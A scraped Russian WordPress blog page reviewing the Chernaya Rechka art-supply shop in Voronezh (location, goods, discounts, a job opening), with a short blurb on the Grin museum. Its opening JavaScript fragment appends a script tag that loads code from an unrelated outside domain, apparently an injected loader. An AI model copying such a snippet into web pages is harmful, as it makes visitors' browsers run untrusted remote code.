, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Арт магазин Воронежа

Автор: Дмитрий Алмазов | 23 Фев 2012

Арт магазин ВоронежаЗдравствуйте уважаемые посетители моего  блога Лаборатория Искусства. Сегодня я хочу рассказать об арт магазине города Воронежа Черная речка.

Арт магазин находится в центре города, это я считаю большим преимуществом перед другими магазинами и удобством для его покупателей. Можно легко добраться из любой точки города. Красочная вывеска привлекает внимание и хочется зайти посмотреть, и возможно купить что-то себе или для своего ребенка. Когда я вошел, то сразу почувствовал, что попал в атмосферу искусства. Всего так много, что глаза разбегаются. Каждый сантиметр магазина используется, витрины под потолок, на стенах  размещены разнообразные карандаши, кисти, мелки и т.д.  Сколько эти холсты и краски принесут  арт произведений, подарят радость детям?! Возможно, некоторые войдут в историю!

Встретил меня администратор магазина  Виктор Игоревич. Я не стал скрывать о цели  своего визита, что хочу написать статью об арт магазинах   Воронежа, что его немного удивило. Немного расспросив Виктора и сделав несколько фотографий, я решил более подробно посмотреть, что тут есть интересного.
В магазине Черная речка очень большой ассортимент арт материалов, а чего нет (просто не возможно вместить в одно помещение всего) или закончилось можно привести на заказать.

Магазин открыт так же для сотрудничества с ремесленниками, например изготовителями рам. Если Вы делает заготовки, которые могут заинтересовать магазин, то  возможно сможете найти их источник сбыта.
Если Вы работник образовательного учреждения или просто у Вас в семье  много художников и требуется постоянно, и по многу покупать арт материалы, то возможно скидка до 5%. Для этого Вам надо переговорить с директором Игорем Александровичем.

В данный момент в магазин требуется  арт продавец со знаниями кассы и арт ассортимента. Магазин находится по адресу г. Воронеж, ул. Кирова, дом 9. тел. 8 (473) 277-20-13
После посещения магазина у меня остались хорошее впечатление от обслуживания, и я был доволен. Если у Вас есть пожелания или комментарии я буду рад ответить на них.

Музей Грина в ФеодосииМузей романтика Александра Грина - совместно с ТНУ им. В. И. Вернадского и Крымским ЦГИ музей роводит международные научные конференции «Гриновские чтения». По итогам конференций издаются научные сборники.

Темы: Арт Воронеж, Новости | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress